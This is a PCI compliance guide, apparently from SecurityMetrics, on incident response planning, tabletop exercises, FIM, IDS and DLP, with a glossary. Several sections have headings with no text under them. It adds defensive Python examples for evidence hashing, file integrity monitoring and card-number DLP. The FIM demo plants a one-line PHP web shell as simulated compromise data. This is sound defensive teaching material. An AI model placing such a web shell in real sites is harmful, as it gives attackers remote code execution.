Preparation often takes the most effort in your incident response planning, but it’s by far the most crucial phase to protect your organization. This ongoing phase includes the following steps:
PHASE 2: IDENTIFY

Identification (or detection) is an ongoing process where you determine whether you’ve actually been breached by looking for deviations from normal operations and activities.

An organization normally learns that they have been breached in one of four ways:
• The breach is discovered internally (e.g., review of intrusion detection system logs, alerting systems, system anomalies, or anti-malware scan alerts).
• Your bank informs you of a possible breach based on reports of customer credit card fraud.
• Law enforcement discovers the breach while investigating the sale of stolen card information.
• A customer complains to you because your organization was the last place they used their card before it began racking up fraudulent charges.

When you discover a breach, remember:
• Don’t panic.
• Don’t make hasty decisions.
• Don’t wipe and reinstall your systems (yet).
• Contact your forensic investigator to help you contain the breach.

PHASE 3: CONTAIN

Steps to consider during containment and documentation:
• Stop the leakage of sensitive data as soon as possible.
• Unplug affected systems from the network, rebuild clean new systems, and keep old systems offline. This is the best option if it’s possible because it allows a forensic investigator to evaluate untouched systems. This is easier to do in virtual server environments but can be costly.
PHASE 4: ERADICATE

After containing the incident, you need to find and remediate the policies, procedures, or technology that led to the breach. This means all malware should be securely removed, and systems should again be hardened, patched, and updated.

Set your incident response plan into motion immediately after learning about a suspected data breach.

PHASE 5: RECOVER

PHASE 6: REVIEW

This is where you will analyze everything about the data breach. Determine what worked well and what didn’t in your response plan. Then, revise your plan.
What To Include In An Incident Response Plan

Creating an incident response plan can seem overwhelming. To simplify the process, develop your incident response plan in smaller, more manageable procedures.

While every organization needs varying policies, training, and documents, there are a few itemized response lists that most organizations should include in their incident response plan, such as:
EMERGENCY CONTACT/COMMUNICATIONS LIST

Proper communication is critical to successfully managing a data breach, which is why you need to document a thorough emergency contact/communications list. Your list should contain information about who to contact, how to reach these contacts, the appropriate timelines to reach out, and what should be said to external parties.

In this list, you should document everyone that needs to be contacted in the event of a data breach, such as the following individuals:
• Response team
• Executive team
• Legal team
• Forensics company
• Public relations
• Affected individuals
• Law enforcement
• Merchant processor

You need to determine how and when notifications will be made. Several states have legislated mandatory time frames that dictate when an organization must make notifications to potentially affected cardholders and law enforcement. You should be aware of the laws in your state and have instructions in your incident response plan that outline how you will make mandated notifications.

Your incident response team should craft specific statements that target the various audiences, including a holding statement, press release, customer statement, and internal/employee statement. For example, you should have prepared emails and talking points ready to go after a data breach.

Your statements should address questions like:
• Which locations were and are impacted by the breach?
• How was the breach discovered?
• Is any other sensitive data at risk?
• How will it affect customers and the community?
• What services or assistance (if any) will you provide your customers?
• When will you be back up and running?
• What will you do to prevent this from occurring again?

Identify in advance the party within your organization that is responsible for timely notifications that fulfill your state’s specific requirements. This could be your inside legal counsel, a newly hired breach management firm, or a C-level executive.

Your public response to the data breach will be judged heavily, so review your statements thoroughly.
SYSTEM BACKUP AND RECOVERY PROCESSES LIST

Your system backup and recovery processes list will help you deal with the technical aspects of a data breach. Here are some things that should be included:
• Process for preserving evidence (e.g., logs, timestamps)

FORENSICS ANALYSIS LIST

A forensics analysis list is for organizations that use in-house forensic investigation resources. Your forensic team will need to know where to look for irregular behavior and how to access system security and event logs. You might need multiple lists based on your different operating systems and functionalities (e.g., server, database).
• Other forensic analysis tools (e.g., EnCase, FTK, X-Ways)
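Preserving evidence means more than keeping a copy: the copy has to be shown to be identical to the original, and later shown to be unchanged. The following is an added example, not code from the guide or from any forensic product, of the evidence-preservation process the backup and recovery list above calls for. It copies log files into an evidence store, hashes each file at collection time, records who collected it and when (in UTC, so entries from hosts in different time zones sort correctly), marks the copies read-only, and writes a manifest that can be re-verified. It also illustrates the earlier point about not wiping systems before they are imaged: the demo tampers with one stored copy and the verification catches it. The directory layout, manifest format and sample log lines are assumptions constructed for the demonstration.

```python
"""Evidence preservation: copy, hash, record chain of custody, re-verify.

Added example, not from the SecurityMetrics guide. Directory layout, manifest
format and the sample log lines are constructed for the demo.
"""
import hashlib
import json
import shutil
import tempfile
from datetime import datetime, timezone
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash in chunks so multi-gigabyte logs do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def collect(sources: list, evidence_dir: Path, collector: str) -> Path:
    """Copy each source into evidence_dir, hash before and after the copy, and
    write a manifest recording the original path, size, mtime, the hash, who
    collected it and when. Stored copies are made read-only."""
    evidence_dir.mkdir(parents=True, exist_ok=True)
    entries = []
    for n, src in enumerate(sources, start=1):
        src_hash = sha256_of(src)
        st = src.stat()
        dest = evidence_dir / f"{n:03d}_{src.name}"
        shutil.copy2(src, dest)  # copy2 preserves the original timestamps
        if sha256_of(dest) != src_hash:
            raise RuntimeError(f"copy of {src} does not match the source")
        dest.chmod(0o440)
        entries.append({
            "item": n,
            "original_path": str(src),
            "stored_as": dest.name,
            "sha256": src_hash,
            "size": st.st_size,
            "original_mtime_utc": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
            "collected_at_utc": datetime.now(timezone.utc).isoformat(),
            "collected_by": collector,
        })
    manifest = evidence_dir / "manifest.json"
    manifest.write_text(json.dumps({"entries": entries}, indent=2))
    manifest.chmod(0o440)
    return manifest


def verify(manifest: Path) -> dict:
    """Re-hash every stored item; anything that no longer matches the manifest
    has been altered or lost since collection."""
    data = json.loads(manifest.read_text())
    result = {"ok": [], "altered": [], "missing": []}
    for e in data["entries"]:
        stored = manifest.parent / e["stored_as"]
        if not stored.exists():
            result["missing"].append(e["stored_as"])
        elif sha256_of(stored) != e["sha256"]:
            result["altered"].append(e["stored_as"])
        else:
            result["ok"].append(e["stored_as"])
    return result


def demo() -> tuple:
    """Constructed scenario: collect two logs, verify, then simulate someone
    wiping a stored copy and verify again."""
    work = Path(tempfile.mkdtemp())
    logs = work / "var_log"
    logs.mkdir()
    # Constructed sample log lines (not real hosts or addresses).
    (logs / "auth.log").write_text(
        "Mar 15 02:11:03 pos1 sshd[412]: Accepted password for admin from 203.0.113.7\n")
    (logs / "access.log").write_text(
        '203.0.113.7 - - [15/Mar:02:12:40 +0000] "POST /checkout.php HTTP/1.1" 200\n')
    manifest = collect([logs / "auth.log", logs / "access.log"], work / "evidence", "responder-1")
    before = verify(manifest)
    tampered = work / "evidence" / "001_auth.log"
    tampered.chmod(0o640)
    tampered.write_text("")  # simulated tampering: the stored copy is emptied
    after = verify(manifest)
    return before, after


if __name__ == "__main__":
    for label, report in zip(("at collection", "after tampering"), demo()):
        print(label, json.dumps(report))
```

In practice the manifest and the hashes should also be copied somewhere the compromised host cannot reach, and the original systems left untouched (powered off or isolated) until the forensic investigator has imaged them; hashing a copy proves the copy, not the condition of the original.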
JUMP BAG LIST

Your jump bag list is for grab-and-go responses (i.e., when you need to respond to a breach quickly). This list should include overall responses and actions employees need to take immediately after a data breach. Your list will keep your plan organized and prevent mistakes caused by panic.

Some things to include in your jump bag list are:
• Incident handler’s journal to document the incident (e.g., who, what, where, when, why)
• Incident response team contact list
• USB hard drives and write-blockers

SECURITY POLICY REVIEW LIST

Your security policy review list deals with your response to a breach and its aftermath. This list helps you analyze the breach, so you can learn what to change.

Your security policy review list should include documentation of the following things:
• When the breach was detected, by whom, and by what method
• Scope of the incident and affected systems
• Data that was put at risk
• How the breach was contained and eradicated
Develop Your Incident Response Plan

Developing and implementing a thorough incident response plan will help your business handle a data breach quickly and efficiently, while also minimizing the damage from a data breach.

STEP 1: IDENTIFY AND PRIORITIZE ASSETS

STEP 2: IDENTIFY POTENTIAL RISKS

Determine what risks and attacks are the greatest current threats against your systems. Keep in mind that these risks will be different for every organization.

For organizations that process data online, improper coding could be their biggest risk. For a brick-and-mortar organization that offers Wi-Fi for their customers, their biggest risk may be improper network access. Some organizations may place a higher priority on ensuring physical security, while others may focus on securing their remote access applications.
• Email security: Malware executed via an email message or attachment
• Impersonation: Replacement of something benign with something malicious (e.g., SQL injection attacks, rogue wireless access points)
If you don’t have established procedures to follow, a panicked employee may make detrimental security decisions that could damage your organization.

Your data breach policies and procedures should include:
• How to identify and contain a breach

Over time, you may need to adjust your policies according to your organization’s needs. Some organizations might require a more robust notification and communication plan, while others might need help from outside resources. However, all organizations need to focus on employee training (e.g., on your security policies and procedures).

Organize an incident response team that coordinates your organization’s actions after a data breach. Your team’s goal should be to coordinate resources during a security incident to minimize impact and restore operations as quickly as possible.

Some of the necessary team roles are:
• IT director
• Public relations
• Documentation and timeline leader
• Human resources
• Legal representative

Make sure your response team covers all aspects of your organization and that each member understands their particular role in the plan. Each member will bring a unique perspective to the table, and they should own specific data breach response roles that are documented to manage a crisis.
STEP 5: SELL THE PLAN

Your incident response team won’t be effective without proper support and resources to follow your plan.

Security is not a bottom-up process. Management at the highest level (e.g., CEO, VP, CTO) must understand that security policies, like your incident response plan, must be implemented from the top and pushed down. This is true for both enterprise organizations and mom-and-pop shops.

STEP 6: TRAIN YOUR STAFF

Just having an incident response plan isn’t enough. Employees need to be properly trained on your incident response plan and know what they’re expected to do after a data breach. This means training your team on a regular basis to ensure they know how to respond.

The regular work routine makes it easy for staff to forget crucial security lessons and best practices.
Test Your Incident Response Plan

To help staff, regularly test their reactions through real-life simulations such as tabletop exercises. Tabletop exercises allow employees to learn and practice their incident response roles when nothing is at stake, which can help you discover gaps in your incident response plan (e.g., communication issues).

TYPES OF TABLETOP EXERCISES

DISCUSSION-BASED EXERCISE

In a discussion-based tabletop exercise, incident response team members discuss response roles in hypothetical situations. This tabletop exercise is a great starting point because it doesn’t require extensive preparation or resources, while it still tests your team’s response to real-life scenarios without risk to your organization.

SIMULATION EXERCISE

In a simulation exercise, your team tests their incident responses through a live walk-through test that has been highly choreographed and planned. This exercise allows participants to experience how events actually happen, helping your team better understand their roles.

However, simulation exercises require a lot of time to plan and coordinate, while still not fully testing your team’s capabilities.

PARALLEL TESTING

In parallel testing, your incident response team actually tests their incident response roles in a test environment. Parallel testing is the most realistic simulation and provides your team with the best feedback about their roles.

Parallel testing is more expensive and requires more time planning than other exercises because you need to simulate an actual production environment, with realistic systems and networks.

CONDUCT A TABLETOP EXERCISE

Before conducting a tabletop exercise, determine your organization’s needs by asking:
• Has there been any recent guidance or legislation that might impact your response plan?

Next, design your tabletop exercise around an incident response plan topic or section that you want tested. Identify any desired learning objectives or outcomes. From there, create and coordinate with your tabletop exercise staff (e.g., facilitator, participants, and data collector) to schedule your tabletop exercise.
When designing your tabletop exercise, prepare the following exercise information in advance:
• A participant guide that includes the same information as the facilitator guide, except it either doesn’t include any of the questions or includes a shorter list of questions designed to prepare participants.

Your team’s input will help you know where and how to make necessary revisions to your incident response plan and training processes.
Data Breach Prevention Tools

This section outlines data breach prevention tools that can help improve your data breach response and increase your data security.

INSTALL AND MONITOR FILE INTEGRITY MONITORING SOFTWARE

File integrity monitoring (FIM) software is a great companion for your malware prevention controls. New malware comes out so frequently that you can’t rely on anti-virus software alone to protect your systems. New malware can circulate for days or weeks, and sometimes longer, before a signature for it reaches the anti-virus signature files and it can be detected.

Configure FIM software to watch critical file directories for changes. FIM software is typically configured to monitor areas of a computer’s file system where critical files are located. FIM tools will generate an alert that can be monitored when a file is changed.

Malware is software that consists of files that are copied to a target computer. Even if your anti-virus software cannot recognize the malware files’ signatures, FIM software will detect that files have been written to your computer and will alert you to check and make sure you know what those files are. If the change was known (like a system update), then you don’t need to worry. If not, chances are you have new malware that could not be detected and can now be dealt with.

Keep in mind what FIM watches: the file system. In-memory-only (fileless) malware, and changes to files outside the monitored paths, will not raise an alert, so pair FIM with log review rather than relying on it alone.

Here are some places where FIM should be set up to monitor:
• Operating system critical directories
• Critical installed application directories
• Web server and/or web application directories
• User areas (if an employee-facing computer)

FIM can also be set up to check if web application code or files are modified by an attacker.
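The following is an added example, not code from the guide or from any FIM product, of what such a tool does at its core: it records a hash, size and permission bits for every file under a monitored directory, stores that baseline, and later reports files that were added, removed or modified. The web root, file names and simulated compromise (a dropped web shell, a modified checkout script, a script made world-writable) are constructed for the demonstration. PCI DSS requires critical-file comparisons at least weekly; a real deployment would run the comparison on that schedule or continuously and route the report to whoever reviews alerts.

```python
"""Core of a file integrity monitor: baseline a directory tree, then report
what changed. Added example, not from the SecurityMetrics guide; the monitored
path, baseline file name and sample files are assumptions for the demo."""
import hashlib
import json
import os
import stat
import tempfile
from pathlib import Path


def file_sha256(path: Path) -> str:
    """Hash in chunks so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path) -> dict:
    """Record hash, size and permission bits of every regular file under root.
    Permission bits are included because a script that is made setuid or
    world-writable has not changed in content, so a content-only baseline
    would miss it."""
    baseline = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        st = path.stat()
        baseline[str(path.relative_to(root))] = {
            "sha256": file_sha256(path),
            "size": st.st_size,
            "mode": stat.S_IMODE(st.st_mode),
        }
    return baseline


def compare(old: dict, new: dict) -> dict:
    """Classify the differences between two snapshots."""
    return {
        "added": sorted(new.keys() - old.keys()),
        "removed": sorted(old.keys() - new.keys()),
        "modified": sorted(n for n in old.keys() & new.keys() if old[n] != new[n]),
    }


def save_baseline(baseline: dict, dest: Path) -> None:
    """Keep the baseline outside the monitored tree and not writable by the
    service account: an attacker who can rewrite the baseline can
    re-baseline their own changes."""
    dest.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(src: Path) -> dict:
    return json.loads(src.read_text())


def demo(workdir=None) -> dict:
    """Constructed scenario: baseline a fake web root, then simulate an intruder
    dropping a web shell, altering checkout code and loosening a script's mode."""
    workdir = workdir or Path(tempfile.mkdtemp())
    webroot = workdir / "webroot"
    (webroot / "app").mkdir(parents=True, exist_ok=True)
    (webroot / "app" / "checkout.php").write_bytes(b"<?php // takes card numbers\n")
    (webroot / "app" / "cron.sh").write_bytes(b"#!/bin/sh\necho ok\n")
    (webroot / "index.html").write_bytes(b"<h1>Shop</h1>\n")
    save_baseline(snapshot(webroot), workdir / "baseline.json")

    # Simulated compromise (constructed for this example).
    (webroot / "app" / "c99.php").write_bytes(b"<?php eval($_POST['x']);\n")  # new web shell
    (webroot / "app" / "checkout.php").write_bytes(b"<?php // skimmer added\n")  # content change
    os.chmod(webroot / "app" / "cron.sh", 0o777)  # same content, now world-writable

    return compare(load_baseline(workdir / "baseline.json"), snapshot(webroot))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The report distinguishes the three cases an analyst treats differently: a new file in a web directory is almost always worth a look, a modified file has to be matched against the change control record, and a permission-only change is the one that content-hashing alone would have missed.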
INSTALL INTRUSION DETECTION AND PREVENTION SYSTEMS

One of the reasons data breaches are so prevalent is a lack of proactive, comprehensive security dedicated to monitoring system irregularities, such as intrusion detection systems (IDS) and intrusion prevention systems (IPS).

Using these systems can help identify a suspected attack and help you locate security holes in your network that attackers used. Without the knowledge derived from IDS logs, it can be very difficult to find system vulnerabilities and determine if cardholder data was accessed or stolen.

INSTALL DATA LOSS PREVENTION SOFTWARE

In addition to these, you should have data loss prevention (DLP) software in place. DLP software watches outgoing data streams for sensitive or critical data formats that should not be sent through a firewall, and it blocks this data from leaving your system.

Make sure to implement it properly, so that your DLP knows where data is allowed to go; if it’s too restrictive, it might block critical transmissions to third-party organizations.

Also keep in mind what DLP can see. It inspects content it can read, so card data sent over an encrypted or attacker-encoded channel passes unless the DLP sits where the traffic is decrypted. Treat it as one layer of defense, not the last one.
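What a DLP rule for cardholder data actually has to do is shown by the following added example, which is not code from the guide or from any DLP product: it finds digit runs that look like PANs in an outgoing payload, discards false positives with the Luhn check that every real PAN passes, masks what it found so the alert itself does not leak card data, and allows or blocks depending on whether the destination is one permitted to receive card data. The allow-list, hostnames and payloads are constructed for the demo; the card numbers are well-known test numbers, not real accounts.

```python
"""Content-inspection step of a DLP control for cardholder data.

Added example, not from the SecurityMetrics guide or any DLP product. The
destination allow-list, hostnames and payloads are constructed; the card
numbers are well-known test numbers, not real accounts.
"""
import re

# A candidate PAN is 13 to 19 digits, optionally separated by single spaces or
# hyphens. The look-around assertions stop matches inside a longer digit run.
_PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit test (ISO/IEC 7812). Every real PAN passes; about nine
    in ten random digit runs fail, which keeps order numbers and timestamps
    out of the alerts."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                      # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_pans(text: str) -> list:
    """Digit-only form of every Luhn-valid candidate in text."""
    found = []
    for m in _PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            found.append(digits)
    return found


def mask(pan: str) -> str:
    """PCI display rule: at most the first six and last four digits in clear."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


# Constructed allow-list of destinations permitted to receive PANs (the payment
# gateway). A rule that blocks every PAN everywhere would also block checkout.
ALLOWED_PAN_DESTINATIONS = {"gateway.example-processor.test"}


def inspect(destination: str, payload: str) -> dict:
    """Decide whether an outgoing message may leave; report only masked PANs."""
    pans = find_pans(payload)
    if pans and destination not in ALLOWED_PAN_DESTINATIONS:
        action = "block"
    else:
        action = "allow"
    return {"destination": destination, "action": action,
            "pans": [mask(p) for p in pans]}


if __name__ == "__main__":
    samples = [  # constructed outgoing messages
        ("gateway.example-processor.test", "card=4111 1111 1111 1111&exp=1227"),
        ("paste.example.test", "dump: 5555555555554444, order 1234567890123456"),
        ("crm.example.test", "order 1234567890123456 shipped 2024-03-15"),
    ]
    for dest, body in samples:
        print(inspect(dest, body))
```

The third sample is the over-restriction case the guide warns about: a 16-digit order number that looks like a PAN but fails the Luhn check, so a legitimate transmission is not blocked. The inspection only works on plaintext it can read, which is why the placement of the DLP relative to TLS termination matters.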
Conclusion
PCI DSS Budget

The cost of PCI compliance depends on your organization’s structure. Here are a few variables that will factor into the overall cost of your compliance with the PCI DSS:
Create A Security Culture

Unless someone oversees PCI on management’s side (not just IT), PCI compliance won’t happen. We often see departments inside companies (e.g., networking, IT, HR, risk) expecting other departments to take charge of PCI compliance, which means nobody is in charge of it. Other times, organizations expect a third-party QSA to be the PCI project manager, which is not feasible because the QSA’s role is to assess what is in place, not create a security and compliance program.

Security is not a bottom-up process. Management often says or implies that IT should “just get their organization secure.” However, those placed in charge of PCI compliance and security may not have the means necessary to reach their goals.

For example, IT may not have the budget to implement adequate security policies and technologies (e.g., firewalls, FIM). Some may try to look for free software to fill in security gaps, but this process can be expensive due to the time it takes to implement and manage. In some instances, we have seen IT departments wanting their PCI auditor to purposely fail their compliance evaluations so they could prove their higher security budget needs. Obviously, it would have been better to focus on security from the top level down beforehand.

C-level management should support the PCI process. If you are a C-level executive, you should be involved with budgeting, assisting, and establishing a security culture from the top down.

OVERCOME MANAGEMENT’S BUDGET CONCERNS

If you’re having problems communicating budgetary needs to management, conduct a risk assessment before starting the PCI process. NIST SP 800-30 is a good risk assessment protocol to follow. At the end of your assessment, you’ll have an idea of your compromise probability, how much a compromise would cost, and the impact a breach might have on your organization (including brand damage).

Simply put, you need to find a way to show how much money weak security will cost the organization. For example, “if someone gains access to the system through X, this is how much it will cost and how much damage it will cause.” Consider asking marketing or accounting teams for help delivering the message in more bottom-line terms.

If possible, work with a QSA to identify security controls to address what tools you may need to implement.
JEN STONE
SecurityMetrics Senior Security Analyst
CISSP | CISA | QSA | CCSFP | CHQP

In my experience, small merchants and service providers tend to struggle with documenting and following policies and procedures. During a PCI DSS assessment, a QSA will verify that required policies and procedures are in place and being followed.

Smaller merchants and service providers whose CDE consists of only a few machines often feel that they don’t have time to document procedures. Unfortunately, it’s not uncommon to perform a renewal assessment where the business neglected to maintain compliance due to employee turnover and lack of documentation.

At a minimum, small merchants should set up a PCI email user or Active Directory account and add reminders in their calendar to perform security processes throughout the year (e.g., quarterly vulnerability assessment scans, semi-annual firewall reviews). The evidence collected from these tasks can then be sent to that PCI account for storage. This is a low-cost solution that can help key personnel keep PCI DSS compliance on their minds throughout the year. It will also help document necessary evidence for their annual self-assessment (or for their assessor).

Large enterprise organizations usually document their policies and procedures sufficiently. They generally have very specific and thorough change control processes, and they typically follow documented approval processes prior to implementing changes to their CDE. Unfortunately, due to their size and the different entities involved in their CDE management, their reaction time tends to be much slower, with different stakeholders often making contradictory decisions. When vulnerability scans or penetration tests identify weaknesses that may place their CDE at risk, it’s not always apparent which group should be responsible for addressing these vulnerabilities.
To help address some of these concerns, Requirement 12 details how service providers need to define a charter for the organization’s compliance program, involving executive management. While this is only required for service providers, it’s recommended that larger merchants follow this requirement as well.

Large organizations and service providers should establish an official PCI charter that describes the management and accountability of the organization’s compliance program.[3] Additionally, they should implement internal audit procedures to ensure security practices are properly in place throughout the year.[3]

PCI compliance cannot just be an annual audit event.

Often, organizations are not leveraging many of the PCI requirements in a way that actually increases security for their CDE.

For instance, PCI requires log centralization and daily reviews. PCI also requires change detection or FIM on CDE systems to detect unauthorized changes to key files and directories. To achieve compliance, organizations might set up log monitoring and FIM, but then ignore every alert coming their way. They may technically have FIM and log monitoring in place, but these systems alone are not making their environments more secure because the necessary time and effort are not taken to respond to genuine alerts.

As you implement your cybersecurity program, make sure you understand why a security control is required so you can structure tools and processes around the protection each control offers.
Terms And Definitions

Access Control List (ACL): A list of rules that tells a firewall, router, or operating system which traffic or which users to allow or deny.

Advanced Encryption Standard (AES): A government encryption standard used to secure sensitive electronic information.

Approved Scanning Vendor (ASV): A company approved by the PCI SSC to conduct external vulnerability scans.

Captured: Data is being recorded, gathered, or stored by an unauthorized party.

Card Verification Value (CVV/CSC/CVC/CAV): A check value on a payment card that verifies the card data is genuine; the stripe version is encoded on the magnetic stripe, and the printed version (e.g., CVV2) is used for card-not-present transactions. The specific acronym depends on the card brand.

Cardholder Data Environment (CDE): The people, processes, and technology that store, process, or transmit cardholder data, and any system connected to them.

Cardholder Data (CHD): Sensitive data found on payment cards, such as the account holder name or the PAN.

Chief Information Security Officer (CISO): Similar to a CSO, but with responsibility for information security rather than entity-wide security.

Data Loss Prevention (DLP): Software or a strategy used to detect and block sensitive data being sent outside the network.

Domain Name System (DNS): The system that translates host names in URLs to IP addresses.

Exfiltrated: The unauthorized transfer of data out of a system.

Federal Information Processing Standards (FIPS): US federal government standards for computer security that are publicly announced (e.g., encryption standards).

File Integrity Monitoring (FIM): A method to watch for changes in software, systems, and applications to detect potential malicious activity.

File Transfer Protocol (FTP): An insecure way to transfer files between computers over the Internet; credentials and data are sent in the clear. (See SFTP)

Firewall (FW): A system designed to screen incoming and outgoing network traffic.

Hypertext Transfer Protocol (HTTP): A method of communication between servers and browsers, without encryption. (See HTTPS)

Hypertext Transfer Protocol Secure (HTTPS): HTTP carried over TLS, so that traffic between browser and server is encrypted and the server is authenticated. (See HTTP)

Incident Response Plan (IRP): Policies and procedures to effectively limit the effects of a security breach.

Information Technology (IT): Anything relating to networks, computers, and programming, including the people that work with those technologies.

Internet Protocol (IP): Defines how computers send packets of data to each other.

Intrusion Detection System (IDS): A system used to monitor network traffic and report potential malicious activity.

Intrusion Prevention System (IPS): A system that, like an IDS, monitors network traffic and reports potential malicious activity, but also blocks many of the attacks it detects.

Multi-factor Authentication (MFA): At least two of three independent methods of authentication are required to verify a computer or network user. The three possible factors are:
• Something you know (such as a password or PIN)
• Something you have (such as a hardware token or phone)
• Something you are (such as a fingerprint)

Network Access Control (NAC): Restricts which devices and users can connect to a network and what they can reach on it.

Open Web Application Security Project (OWASP): A non-profit organization focused on software security improvement. Often heard in the context of the “OWASP Top 10,” a list of the most critical web application security risks.

Payment Card Industry Data Security Standard (PCI DSS): Requirements put together by the PCI SSC, required of all businesses that process, store, or transmit payment card data, to help prevent cardholder data theft.

Payment Card Industry Security Standards Council (PCI SSC): An organization established in 2006 by Visa, MasterCard, American Express, Discover Financial Services, and JCB International to regulate cardholder data security.

Point-To-Point Encryption (P2PE): Payment card data encryption from the point of interaction to a merchant solution provider.

Primary Account Number (PAN): The 12 to 19 digits that identify a payment card. Also called a bank card number or payment card number.

Qualified Security Assessor (QSA): Individuals and firms certified by the PCI SSC to perform PCI compliance assessments.

Role-Based Access Control (RBAC): Restricting users’ access to systems based on their role within an organization.

Secure (SSH) File Transfer Protocol (SFTP): A way to transfer files over an SSH connection, so that credentials and data are encrypted in transit. (See FTP)

Secure Socket Layer (SSL): An outdated Internet security standard for encrypting the link between a website and a browser to enable transmission of sensitive information (predecessor to TLS).

Self-Assessment Questionnaire (SAQ): A collection of questions used to document an entity’s PCI DSS assessment results, based on their processing environment.

Threat: The potential for a person, event, or action to exploit a specific vulnerability.

Transport Layer Security (TLS): The current Internet security standard for encrypting the link between a website and a browser to enable transmission of sensitive information (successor to SSL). (See SSL)
Our Products and Services
www.securitymetrics.com/pci
Looking for a
PCI compliance
solution?